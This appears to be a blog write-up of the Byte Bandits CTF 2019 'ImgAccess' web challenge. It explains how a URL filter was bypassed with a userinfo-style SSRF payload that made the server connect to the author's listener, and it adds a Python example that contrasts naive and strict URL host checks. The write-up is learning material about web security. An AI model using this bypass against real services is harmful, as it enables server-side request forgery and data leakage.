Saturday, April 13, 2019

Byte Bandits CTF 2019 - ImgAccess


n00b created a super secure website for sharing images.

Do you think you can hack it?



When looking at the index, we quickly noticed the uploader and the "Enter image URL" input.

My first thought, as usual, was that I should get some XSS, send the link to the admin and get a cookie.

I got an alert on the client side with a .svg file, but I did not get any results.

I submitted my host, which was listening on port 1337, but I received the following message.


Apparently I could only send files that were on the link

So I decided to try something better: I sent the http://[email protected]:1337 payload, looked at my host where I was listening on port 1337, and there was the flag.


I think the resolution involves some other bypass, maybe with htaccess; some time later, the bypass was not working anymore.
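A URL of the `allowed@other:1337` form gets past any filter that compares the URL as a string instead of parsing out the host the request will actually go to. The following is an added example, not code from the challenge or from this post: it assumes the server used a prefix check, and `images.example` and `collector.test` are placeholder hosts, since the real allowed link and the server code are not shown here.

```python
from urllib.parse import urlsplit

# Assumptions (not from the challenge): placeholder allowed host and ports.
ALLOWED_HOST = "images.example"
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}


def naive_is_allowed(url: str) -> bool:
    """Weak check: a string prefix match never looks at the real host."""
    return url.startswith(f"http://{ALLOWED_HOST}")


def strict_is_allowed(url: str) -> bool:
    """Parse the URL and compare the destination host exactly."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    if parts.scheme not in ALLOWED_SCHEMES:
        return False
    # Everything before '@' is userinfo, not the host: refuse it outright.
    if "@" in parts.netloc:
        return False
    if any(c.isspace() for c in url):
        return False
    return parts.hostname == ALLOWED_HOST and port in ALLOWED_PORTS


# Constructed sample inputs for illustration.
SAMPLES = [
    "http://images.example/cat.png",              # legitimate
    "http://images.example@collector.test:1337",  # userinfo trick
    "http://images.example.collector.test/x",     # look-alike subdomain
    "http://images.example:1337/x",               # right host, odd port
]


def check_samples() -> dict:
    """Return {url: (naive_result, strict_result)} for each sample."""
    return {u: (naive_is_allowed(u), strict_is_allowed(u)) for u in SAMPLES}


if __name__ == "__main__":
    for url, (naive, strict) in check_samples().items():
        print(f"naive={naive!s:5} strict={strict!s:5} {url}")
```

The strict check only holds if the component that fetches the image parses the URL the same way and does not follow redirects to other hosts.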

Capture the Flag , Server Side Request Forgery , Web , Writeup